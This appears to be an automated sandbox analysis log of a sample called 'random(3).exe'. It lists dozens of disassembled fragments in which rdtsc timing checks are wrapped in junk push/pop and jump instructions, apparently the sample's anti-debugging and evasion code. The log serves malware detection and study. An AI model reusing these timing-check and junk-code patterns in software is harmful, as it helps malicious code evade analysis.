      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5683D second address: A56868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F9984B08D15h 0x00000010 je 00007F9984B08D06h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A56868 second address: A56872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F998484EB06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A59350 second address: A59360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9984B08D06h 0x0000000a jo 00007F9984B08D06h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A59503 second address: A5950D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F998484EB12h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5CF63 second address: A5CF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5CF67 second address: A5CF6D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5CF6D second address: A5CFA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F9984B08D17h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9984B08D10h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5CFA2 second address: A5CFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5CFA6 second address: A5CFAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5CFAE second address: A5CFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5D0E1 second address: A5D101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9984B08D19h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5D101 second address: A5D105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5D105 second address: A5D126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5D126 second address: A5D12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5EA50 second address: A5EA64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D10h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A5EA64 second address: A5EA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F998484EB17h 0x0000000b jmp 00007F998484EB0Eh 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F998484EB06h 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A62CE4 second address: A62CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D15h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A62CFF second address: A62D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A62D04 second address: A62D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9984B08D0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A62D17 second address: A62D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A632C8 second address: A632D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A632D2 second address: A632F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F998484EB06h 0x00000008 jmp 00007F998484EB15h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F998484EB0Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A63424 second address: A63439 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9984B08D0Dh 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A63439 second address: A63444 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A63581 second address: A6359B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9984B08D08h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9984B08D0Eh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6359B second address: A635B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F998484EB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F998484EB06h 0x00000017 jo 00007F998484EB06h 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A635B8 second address: A635C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9984B08D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A669D5 second address: A669DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A66173 second address: A66177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6644C second address: A66452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A66452 second address: A6645C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6672B second address: A66735 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9CB32B second address: 9CB331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9CB331 second address: 9CB335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9CB335 second address: 9CB339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9CB339 second address: 9CB342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6AEEA second address: A6AEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6AEF1 second address: A6AF01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB0Ch 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B466 second address: A6B480 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9984B08D0Ch 0x00000008 jg 00007F9984B08D06h 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B5B9 second address: A6B5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B5BD second address: A6B5C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B5C7 second address: A6B5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B5CB second address: A6B5D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B5D1 second address: A6B5D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B5D6 second address: A6B609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D10h 0x00000009 jmp 00007F9984B08D14h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jno 00007F9984B08D06h 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B609 second address: A6B634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F998484EB0Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F998484EB0Dh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B634 second address: A6B63C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B90B second address: A6B90F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B90F second address: A6B93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9984B08D0Eh 0x0000000e jmp 00007F9984B08D18h 0x00000013 pop eax 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6B93F second address: A6B95C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F998484EB0Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F998484EB06h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6C3A3 second address: A6C3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A6C3A9 second address: A6C3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A756A4 second address: A756AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9984B08D06h 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A756AF second address: A756B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A756B4 second address: A756BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A737AB second address: A737B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A73DA9 second address: A73DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A745CC second address: A745E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007F998484EB06h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A745E5 second address: A745EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A74B4F second address: A74B75 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F998484EB06h 0x00000008 jmp 00007F998484EB19h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A74B75 second address: A74B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A75404 second address: A75448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F998484EB15h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnp 00007F998484EB06h 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F998484EB15h 0x0000001c jg 00007F998484EB0Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A75448 second address: A75453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A79FBB second address: A79FCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F998484EB06h 0x00000009 jnp 00007F998484EB06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D222 second address: A7D228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D228 second address: A7D22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D3C7 second address: A7D3E3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9984B08D06h 0x00000008 jmp 00007F9984B08D0Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D3E3 second address: A7D3E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D3E7 second address: A7D40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9984B08D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push ebx 0x0000000e jmp 00007F9984B08D17h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D40F second address: A7D415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D415 second address: A7D41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D56E second address: A7D58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jmp 00007F998484EB19h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D58E second address: A7D5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9984B08D19h 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D5AD second address: A7D5C4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F998484EB06h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D883 second address: A7D889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D889 second address: A7D88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7D88D second address: A7D896 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7DB7C second address: A7DB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7DB84 second address: A7DB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7DCCE second address: A7DD02 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jp 00007F998484EB1Bh 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A7DD02 second address: A7DD25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D19h 0x00000007 jns 00007F9984B08D25h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D0348 second address: 9D0356 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9D0356 second address: 9D035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A89A7F second address: A89A89 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F998484EB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A89A89 second address: A89A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A89A8F second address: A89A9C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F998484EB08h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A89A9C second address: A89AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D12h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87B17 second address: A87B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87B24 second address: A87B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9984B08D16h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87C97 second address: A87CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F998484EB10h 0x00000009 popad 0x0000000a jmp 00007F998484EB0Ah 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87CB6 second address: A87CF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D0Ah 0x00000007 jmp 00007F9984B08D14h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F9984B08D0Ah 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a jng 00007F9984B08D0Ch 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A87CF0 second address: A87D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB11h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F998484EB06h 0x0000000f jns 00007F998484EB06h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8810D second address: A88111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88111 second address: A88139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB0Ah 0x00000007 jmp 00007F998484EB14h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88139 second address: A8813D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8813D second address: A88141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A88141 second address: A8814F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F9984B08D06h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8845A second address: A8845F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A8845F second address: A88467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
